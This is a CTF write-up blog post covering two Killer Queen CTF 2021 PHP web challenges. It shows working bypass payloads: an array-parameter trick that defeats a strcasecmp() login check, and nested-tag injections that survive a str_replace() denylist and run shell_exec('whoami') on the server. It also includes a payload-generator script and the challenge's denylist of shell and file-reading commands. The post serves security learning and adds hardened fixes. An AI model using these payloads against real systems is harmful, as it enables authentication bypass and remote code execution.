atx0mg's Fortress.

Killer Queen CTF 2021

2021/10/31

Web

Just Not My Type


  • Challenge Description => Simple login page

  • Source code:

    <h1>I just don't think we're compatible</h1>

    <?php
    $FLAG = "shhhh you don't get to see this locally";

    if ($_SERVER['REQUEST_METHOD'] === 'POST')
    {
        // Whatever PHP parsed from the body: a string for password=..., an array for password[]=...
        $password = $_POST["password"];
        // Loose (==) comparison against strcasecmp()'s return value
        if (strcasecmp($password, $FLAG) == 0)
        {
            echo $FLAG;
        }
        else
        {
            echo "That's the wrong password!";
        }
    }
    ?>

    <form method="POST">
        Password
        <input type="password" name="password">
        <input type="submit">
    </form>
  • Vulnerability:

    • It turns out that the check is bypassed when the password parameter is an array: the comparison with 0 then evaluates as "equal"
    • The reason is that strcasecmp() only accepts strings. If a user sends password[]=123456, $_POST["password"] is an array; on PHP 7 the call emits a warning and returns NULL, and the loose comparison NULL == 0 is true. (On PHP 8 the same call throws a TypeError instead, so the trick is version-dependent.)
  • BurpSuite to send the payload

    • We don't even need to give the array a value: sending just password[] is enough, because any array makes strcasecmp() return NULL
  • Got the flag: flag{no_way!_i_took_the_flag_out_of_the_source_before_giving_it_to_you_how_is_this_possible}

    Resources for first challenge:

  • CSAW-2012-Web

  • PHP Vulnerable functions

  • NULL == 0 returns true in PHP
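  • The bypass side by side with a fixed check, as an added example (not the challenge author's code). The flag value, the function names and the sample inputs are placeholders chosen for the demonstration; the vulnerable function is the challenge's comparison verbatim.

```php
<?php
// Added example, not the challenge's code: the array-argument bypass against
// strcasecmp() and a hardened replacement. $FLAG is a placeholder value.
$FLAG = "supersecret";

function vulnerable_check($password, string $flag): bool {
    // The challenge's check. With password[]= in the POST body, $password is an
    // array: PHP 7 emits a warning, strcasecmp() returns NULL, and NULL == 0 is true.
    // PHP 8 throws a TypeError for the non-string argument instead.
    return strcasecmp($password, $flag) == 0;
}

function hardened_check($password, string $flag): bool {
    // Reject anything that is not a string before comparing, then compare with
    // hash_equals() (strict types, constant time). Case-insensitive matching of a
    // secret is dropped on purpose: it only shrinks the attacker's search space.
    if (!is_string($password)) {
        return false;
    }
    return hash_equals($flag, $password);
}

// Constructed inputs: what $_POST["password"] holds for password[]=, for a wrong
// password, and for the correct one.
$inputs = [
    "password[]="  => [],
    "wrong string" => "nope",
    "correct"      => "supersecret",
];

foreach ($inputs as $label => $input) {
    try {
        // @ silences the PHP 7 warning so only the NULL return value matters
        $v = @vulnerable_check($input, $FLAG) ? "accepted" : "denied";
    } catch (TypeError $e) {
        $v = "TypeError";
    }
    $h = hardened_check($input, $FLAG) ? "accepted" : "denied";
    printf("%-13s vulnerable_check=%-9s hardened_check=%s\n", $label, $v, $h);
}
```

  • Against a live target the same request can be sent without Burp, e.g. `curl -d 'password[]=' http://target/`; the `[]` suffix is what makes PHP build an array instead of a string. On PHP 7 the vulnerable function accepts the array and denies the wrong string; the hardened function only accepts the exact secret on either version.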

Web

PHat Pottomed Girls

  • Challenge Descriptions

  • Challenge Source code

    <?php
    session_start();

    function generateRandomString($length = 15) {
        $characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
        $charactersLength = strlen($characters);
        $randomString = '';
        for ($i = 0; $i < $length; $i++) {
            $randomString .= $characters[rand(0, $charactersLength - 1)];
        }
        return $randomString;
    }

    // Denylist: each str_replace() makes a single pass and does not rescan its own output
    function filter($originalstring)
    {
        $notetoadd = str_replace("<?php", "", $originalstring);
        $notetoadd = str_replace("?>", "", $notetoadd);
        $notetoadd = str_replace("<?", "", $notetoadd);
        $notetoadd = str_replace("flag", "", $notetoadd);

        $notetoadd = str_replace("fopen", "", $notetoadd);
        $notetoadd = str_replace("fread", "", $notetoadd);
        $notetoadd = str_replace("file_get_contents", "", $notetoadd);
        $notetoadd = str_replace("fgets", "", $notetoadd);
        $notetoadd = str_replace("cat", "", $notetoadd);
        $notetoadd = str_replace("strings", "", $notetoadd);
        $notetoadd = str_replace("less", "", $notetoadd);
        $notetoadd = str_replace("more", "", $notetoadd);
        $notetoadd = str_replace("head", "", $notetoadd);
        $notetoadd = str_replace("tail", "", $notetoadd);
        $notetoadd = str_replace("dd", "", $notetoadd);
        $notetoadd = str_replace("cut", "", $notetoadd);
        $notetoadd = str_replace("grep", "", $notetoadd);
        $notetoadd = str_replace("tac", "", $notetoadd);
        $notetoadd = str_replace("awk", "", $notetoadd);
        $notetoadd = str_replace("sed", "", $notetoadd);
        $notetoadd = str_replace("read", "", $notetoadd);
        $notetoadd = str_replace("system", "", $notetoadd);

        return $notetoadd;
    }

    if(isset($_POST["notewrite"]))
    {
        $newnote = $_POST["notewrite"];

        //3rd times the charm and I've learned my lesson. Now I'll make sure to filter more than once :)
        $notetoadd = filter($newnote);
        $notetoadd = filter($notetoadd);
        $notetoadd = filter($notetoadd);

        // The filtered note is written to a .php file next to this script, so the web server executes it
        $filename = generateRandomString();
        array_push($_SESSION["notes"], "$filename.php");
        file_put_contents("$filename.php", $notetoadd);
        header("location:index.php");
    }
    ?>
  • Challenge Entry

  • Analysis => the vulnerability is in filter(), which relies on str_replace():

    • The filter strips specific PHP tags, file-reading functions and shell commands from the note, and it is applied three times
    • str_replace() is easy to bypass because it makes a single left-to-right pass and never rescans its own output. A filtered token can therefore be rebuilt by nesting it inside itself: one pass turns ccatat (or the longer ccatacattcat) back into cat. Since the filter runs three times, each token has to be nested one level deeper than the number of passes, i.e. four copies for three passes (ccccatatatat survives as cat), which is exactly what the <<<<???? ... ????>>>> payloads below do for <? and ?>
    • The cleaned note is then written to a .php file that the server executes, so a surviving <? ... ?> block gives PHP code execution (the <? short open tag has to be enabled, which it was here)
  • Payload:

    • <<<<???? phpinfo(); ????>>>>
    • Result:
  • Payload:

    • <<<<???? echo shell_exec('whoami'); ????>>>>
    • Result:
  • Payload:

    • <<<<???? echo shell_exec('ls -lart'); ????>>>>
    • Result:
  • Payload:

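  • The nesting trick from the analysis above, as an added example (not the challenge author's code): a small generator that wraps a token once per filter pass, checks each layer locally, and applies the challenge's triple filter to confirm what lands in the .php file. The filter() here is a reduced copy of the challenge's token list with identical semantics; nest(), after_three_passes() and filter_until_stable() are names chosen for this example.

```php
<?php
// Added example, not the challenge's code: building a payload that survives
// N passes of a single-pass str_replace() denylist, and checking it locally.
// filter() is a reduced copy of the challenge's token list (same order, fewer tokens).
function filter(string $s): string {
    foreach (["<?php", "?>", "<?", "flag", "cat", "dd", "read", "system"] as $bad) {
        $s = str_replace($bad, "", $s);
    }
    return $s;
}

// Hardened variant (hypothetical): strip until nothing changes, so no listed token
// can survive however deeply it is nested. It is still a denylist (shell_exec,
// passthru, backticks ... are not on it); the real fix is never to write user
// input into a .php file at all.
function filter_until_stable(string $s): string {
    do {
        $prev = $s;
        $s = filter($s);
    } while ($s !== $prev);
    return $s;
}

// Wrap $token in itself once per pass: 'cat' -> 'ccatat' -> 'cccatatat' -> ...
// Each str_replace() pass peels off exactly one layer. Tokens that overlap with
// themselves (e.g. 'dd', where 'dddd' collapses to '') cannot be nested this way,
// so every layer is verified and an exception is thrown when the trick does not apply.
function nest(string $token, int $passes): string {
    $out = $token;
    for ($i = 0; $i < $passes; $i++) {
        $layer = $token[0] . $out . substr($token, 1);
        if (str_replace($token, "", $layer) !== $out) {
            throw new RuntimeException("cannot nest '$token' past $i passes");
        }
        $out = $layer;
    }
    return $out;
}

// The challenge applies filter() three times before writing the note to disk.
function after_three_passes(string $s): string {
    return filter(filter(filter($s)));
}

// The page's phpinfo() payload, generated instead of typed by hand
$payload = nest("<?", 3) . " phpinfo(); " . nest("?>", 3);
echo "sent:               ", $payload, "\n";
echo "written to .php:    ", after_three_passes($payload), "\n";
echo "nested cat:         ", nest("cat", 3), " -> ", after_three_passes(nest("cat", 3)), "\n";
echo "fixpoint filter:    ", filter_until_stable($payload), "\n";

try {
    nest("dd", 3);
} catch (RuntimeException $e) {
    echo "self-overlapping:   ", $e->getMessage(), "\n";
}
```

  • nest("<?", 3) produces <<<<???? and nest("?>", 3) produces ????>>>>, so the generated string is the same payload as above and the triple filter reduces it to <? phpinfo(); ?>. The fixpoint variant keeps stripping until the tags are gone, which is why a single-pass denylist applied a fixed number of times is the wrong design no matter how many times it runs.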
Result

  • I solved two challenges, and all of us solved 9 challenges

Author:atx0mg

Link:https://jeff14994.github.io/2021/10/31/Killer-Queen-CTF-2021/

Publish date:October 31st 2021, 11:06:56 am

Update date:April 22nd 2022, 5:18:57 am

License:This article is licensed under CC BY-NC 4.0
